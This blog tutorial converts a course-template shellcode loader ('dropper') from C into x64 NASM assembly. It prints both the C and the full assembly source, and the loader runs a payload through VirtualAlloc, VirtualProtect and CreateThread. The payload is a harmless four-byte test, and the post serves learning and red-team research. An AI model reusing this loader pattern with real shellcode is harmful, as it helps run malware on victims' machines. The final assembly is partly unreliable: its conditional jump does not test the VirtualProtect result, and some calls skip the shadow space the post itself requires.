Converting a malware dropper to x64 assembly

In this post I'll be listing down lessons I learned while converting a simple malware dropper written in C to x64 assembly.

I started this project as a way to deepen my understanding of assembly so I could be better in malware development and reverse engineering (And also because I love coding in assembly and would always find an excuse to use it).

What to expect

I'll be going through sections of the C file and show the how it can be written accordingly in x64 Windows assembly. Take note, however, that the conversion is not one-to-one, meaning there are other ways of writing it. What I did was to structure the assembly code so that you can easily compare it with the C code while making sure that the end result will be the same.

I won't be covering the basics of assembly because this post does a better job of doing that. And as for the assembler, I'll be using nasm because this is the one I'm most familiar with.

Disclaimer: I am not an expert in any of these topics. I'm just someone who learned things and wish to share it to others. If I'm wrong about anything feel free to point it out.

Credits

The malware dropper that we'll be converting is made by @reenz0h. I found it in kymb0's repository and I learned that it's a part of the Red Team Operator course by Sektor7. I've read good things about the course and I plan to take it in the future, you should check it out too.

The dropper

Here's the malware dropper that we'll be converting:

/*

 Red Team Operator course code template
 storing payload in .data section

 author: reenz0h (twitter: @sektor7net)

*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// 4 byte payload
unsigned char payload[] = {
    0x90,       // NOP
    0x90,       // NOP
    0xcc,       // INT3
    0xc3        // RET
};
unsigned int payload_len = 4;

int main(void) {

    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // Allocate a memory buffer for payload.
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
    printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

    // Copy payload to new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    printf("\nHit me!\n");
    getchar();

    // If all good, run the payload
    if ( rv != 0 ) {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
    }

    return 0;
}

Here is what the code does:

Allocates memory buffer with size payload_len
Copies payload to the buffer
The buffer's memory protection is changed to PAGE_EXECUTE_READ which allows for code execution
A thread is created that runs the payload, which runs indefinitely

It doesn't seem that the program is doing much when run. All we see are the payload and exec_mem addresses for debugging purposes and nothing much else.

converting-a-malware-dropper-to-x64-assembly-01

The most interesting parts with this code will be seen under a debugger, which I'll go through later in this post.

Including external functions

In C, if we want to to use a Windows API function, we need to include the necessary header files and make sure to supply required library names via the linker, like so:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

x64 assembly does not use header files so the process is done differently. First, the necessary ".lib" files should be supplied to the linker:

link dropper_data.obj /subsystem:console /out:dropper_data.exe kernel32.lib msvcrt.lib

Next, every external function that we'll be using in our code needs to be specified as shown below:

segment .text
    global main
    extern ExitProcess
    extern printf
    extern VirtualAlloc
    extern VirtualProtect
    extern RtlMoveMemory
    extern getchar
    extern CreateThread
    extern WaitForSingleObject

Note that the extern keyword in assembly is different in C. Externs in C are used for exporting symbols while they are used for importing symbols in Assembly. global is the one used for exporting.

Once the symbols are properly exported then that is when the functions can be used with the call operand.

The entrypoint

There needs to be an entry point so that the operating system knows where to jump to start our program. We do this in C by declaring a main function:

int main(void) {
    ...
}

In assembly, we declare the entry point with global main (As seen in the previous section) and also supply the main: label within the code. This is where execution will jump to.

segment .text
   global main
   ...
   ...

main:
   push    rbp
   ...
   ...

The payload

The payload in this example is a simple shellcode made for testing purposes. This can be changed to any shellcode of any length as long as payload_len reflects the new size of the shellcode.

// 4 byte payload
unsigned char payload[] = {
    0x90,       // NOP
    0x90,       // NOP
    0xcc,       // INT3
    0xc3        // RET
};
unsigned int payload_len = 4;

In assembly, initializing data is done in segment .data.

segment .data
    ...
    ...
    ;; 4 byte payload
    payload         db  0x90, 0x90, 0xCC, 0xC3
    payload_len     db  4

We can then check the above data laid out in the .data memory segment using a debugger:

converting-a-malware-dropper-to-x64-assembly-02

converting-a-malware-dropper-to-x64-assembly-03

You may notice that our shellcode is not at the start of the .data segment because there are other data that was declared prior to our payload. This is important to note as the order we declare the data will be the order they will appear in memory.

Initialized data

All data in assembly needs to be declared and initialized before it can be used:

segment .data
    msg_hello       db  "Hello world!", 0xd, 0xa, 0
    msg_exec_addr   db  "exec_mem addr", 0
    msg_pload_addr  db  "payload addr", 0   
    msg_format      db  "%-20s : 0x%-016p", 0xd, 0xa, 0
    msg_hit_me      db  "Hit me!", 0xd, 0xa, 0

    ...
    ...
    lea rcx, [msg_format]
    lea rdx, [msg_pload_addr]
    ...
    call    printf
    ...

This is optional in C as you can pass data (like a string) directly to a function without adding it to a variable:

printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

However, under the hood, the C compiler actually places these data on the .data segment for you automatically. If you were to compile and run the C program you would see that the strings are in the .data segment.

Uninitialized data

Memory of certain sizes can be reserved so that it can be used later in a program. These unitialized data is declared not in a .data segment but in a .bss segment (more here).

segment .bss    
    exec_mem    resb    8
    old_protect resb    8

Nasm provides specific "pseudo-instructions" for declaring unitialized data like resb (reserve byte), resw (reserve word), and so on.

Alternatively, this can be written like this:

segment .bss    
    exec_mem        db  8 dup (?)   ; Reserve 8 bytes of ? null value
    old_protect     dq  1           ; DQ = QWORD

It would still work but NASM doesn't like it and would throw a warning.

dropper_data.asm:18: warning: attempt to initialize memory in BSS section `.bss': ignored [-w+other]

The memory for the uninitialized data won't be reserved until the program is loaded. Once it is, we can see the reserved memory in the .data segment.

Any data we move to the previously unitialized data can now be seen from a debugger. See below for an example:

    mov [exec_mem], rax  ; Move "000001F96E100000" to memory

converting-a-malware-dropper-to-x64-assembly-04

Shadow Spaces

When calling a function in x64 Windows assembly, programmers must keep in mind to reserve a "shadow space" before doing a call to an external function that is in another language like C or C++. For example:

    sub     rsp, 32 
    call    getchar
    add     rsp, 32

But what is a shadow space? Here is a quick explanation:

The shadow space is the mandatory 32 bytes (4x8 bytes) you must reserve for the called procedure. It just means you must provide 32 bytes on the stack before calling.

It can be used by compilers to leave a copy of the register values on the stack for later inspection in the debugger. It is meant to be used to make debugging x64 easier.

So in the code above, sub rsp, 32 reserves the shadow space before getchar is called. The space on the stack is highlighted in the image below.

converting-a-malware-dropper-to-x64-assembly-05

call getchar then executes and the "shadow space" gets filled.

converting-a-malware-dropper-to-x64-assembly-06

As the caller, we really do not care about the data that gets placed in the shadows space. So after calling the functions we do add rsp, 32 to reclaim the shadow space.

You'll find out the importance of properly reserving and releasing a shadow space especially if you are relying on the stack for saving local variables. Here is a segment of the code where I found out first-hand the importance of handling the shadow space.

    push    rax                ;; I need rax for later so I pushed it on the stack

    lea     rcx, [msg_hit_me]
    call    printf             ;; printf was expecting a shadow space so it just wrote onto the stack, overwriting the value from RAX before

    call    getchar            ;; getchar did the same too

    pop rax                    ;; The value saved by rax is overwritten

Simply handling the shadow space avoided this problem:

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32            ;; shadow space is reserved
    call    printf             ;; printf can write to the stack without overwriting data that I need
    add     rsp, 32            ;; shadow space is released

    sub     rsp, 32            ;; shadow space is reserved
    call    getchar            ;; same goes with getchar
    add     rsp, 32            ;; shadow space is released

    pop rax                    ;; I got the correct value from rax that I pushed

The above code can be further optimized by only releasing the shadow space after both call to printf and getchar, as shown below:

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32            ;; shadow space is reserved
    call    printf             ;; printf can write to the stack without overwriting data that I need

    call    getchar            ;; same goes with getchar
    add     rsp, 32            ;; shadow space is released

    pop rax                    ;; I got the correct value from rax that I pushed

However, there might come a time when the code will change and you might forget to re-add the code that releases and reserves the shadow space. This may lead to hard-to-find stack related problems. To avoid this, just make it a habit to reserve and release the shadow space every time an external function is called.

As an alternative, you can use a routine that could reserve and release the shadow space automatically like the one below:

shadow_call:
    pop rbx         ; Get the return address pointer in a non-volitile register
    sub rsp, 20h    ; Add the shadow space
    call rax        ; Call the function
    add rsp, 20h    ; Remove the shadow space
    jmp rbx         ; Go back to the stored instruction address
    ret

To call the routine, just do this:

    mov rax, getchar
    call    shadow_call

But honestly, I think it's less complicated to just do the handling of shadow space yourself.

Shadow spaces threw me off a bit when I was researching about this, but everything I said above should be enough of an explanation. If however you want more then go here and then here.

Microsoft x64 Calling Convention

It is also important to note that the calling convention for functions is different for Windows compared to other operating systems.

As a quick reference, if you are going to pass parameters to a function you need to use registers rcx, rdx, r8, and r9 for the first, second, third, and fourth parameters respectively.

Here's an example from our code:

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

In assembly, we supply the parameters like so:

    ;; Make new buffer as executable
    mov rcx, [exec_mem]      ;; First parameter
    xor rdx, rdx
    mov dl, [payload_len]    ;; Second parameter
    mov r8, 0x20             ;; Third parameter
    xor r9, r9
    lea r9, [old_protect]    ;; Fourth parameter
    sub     rsp, 32          ;; Reserve shadow space
    call    VirtualProtect   ;; Call function
    add     rsp, 32          ;; Release shadow space

For functions that require more than four parameters, the stack needs to be utilized. This can get confusing so let me point you to this post as it has diagrams for visualization.

The final code

The rest of the code can be converted using the concepts I've described above. Here is the fully converted code:

    bits 64
    default rel

segment .data
    msg_hello   db  "Hello world!", 0xd, 0xa, 0
    msg_exec_addr   db  "exec_mem addr", 0
    msg_pload_addr  db  "payload addr", 0   
    msg_format  db  "%-20s : 0x%-016p", 0xd, 0xa, 0
    msg_hit_me  db  "Hit me!", 0xd, 0xa, 0

    ;; 4 byte payload
    payload     db  0x90, 0x90, 0xCC, 0xC3
    payload_len     db  4

segment .bss    
    exec_mem    resb    8
    old_protect resb    8   

segment .text
    global main
    extern ExitProcess
    extern printf
    extern VirtualAlloc
    extern VirtualProtect
    extern RtlMoveMemory
    extern getchar
    extern CreateThread
    extern WaitForSingleObject

main:
    push    rbp
    mov     rbp, rsp

    ;; Allocate a memory buffer for payload.
    mov rcx, 0
    xor rdx, rdx
    mov dl, [payload_len]
    mov r8, 0x3000
    mov r9, 0x4
    sub     rsp, 32 
    call    VirtualAlloc
    add     rsp, 32 

    mov [exec_mem], rax

    lea     rcx, [msg_format]
    lea rdx, [msg_pload_addr]
    lea r8, payload
    sub     rsp, 32 
    call    printf
    add     rsp, 32 

    lea     rcx, [msg_format]
    lea rdx, [msg_exec_addr]
    mov r8, [exec_mem]
    sub     rsp, 32

    call    printf
    add     rsp, 32 

    ;; Copy payload to new buffer
    mov rcx, [exec_mem]
    lea rdx, [payload]
    xor r8, r8
    mov r8b, [payload_len]
    sub     rsp, 32     
    call    RtlMoveMemory
    add     rsp, 32 

    ;; Make new buffer as executable
    mov rcx, [exec_mem]
    xor rdx, rdx
    mov dl, [payload_len]
        mov r8, 0x20
    xor r9, r9
    lea r9, [old_protect]
    sub     rsp, 32     
    call    VirtualProtect
    add     rsp, 32

    push    rax

    lea     rcx, [msg_hit_me]
    sub     rsp, 32         
    call    printf
    add     rsp, 32 

    sub     rsp, 32             
    call    getchar
    add     rsp, 32

    pop rax

    ;; If all good, run the payload 
    jz  ifrvzero

    xor rcx, rcx
    xor rdx, rdx
    mov r8, [exec_mem]
    xor r9, r9
    push    r9
    push    r9
    call    CreateThread

    mov rcx, rax
    mov rdx, 0xFFFFFFFF
    call    WaitForSingleObject

ifrvzero:

    xor     rax, rax
    call    ExitProcess

As mentioned before, I did my best to match the structure of the C code to the assembly code to make it easy to compare how one section was translated to the other. There are other parts like the jz ifrvzero conditonal jump that I didn't discuss, but those can be easily be understood if you know the basics in assembly.

I've also uploaded the code on it's own repository here. Updates and fixes to the code will be pushed there.

A lot of the concepts I've described in this post were the lessons I learned while working on this project. Most of these can be researched but I'm hoping that collecting them in one location would benefit the next bloke who is crazy like me to do the same.

Feel free to reach out to me on Twitter or LinkedIn for any questions or comments.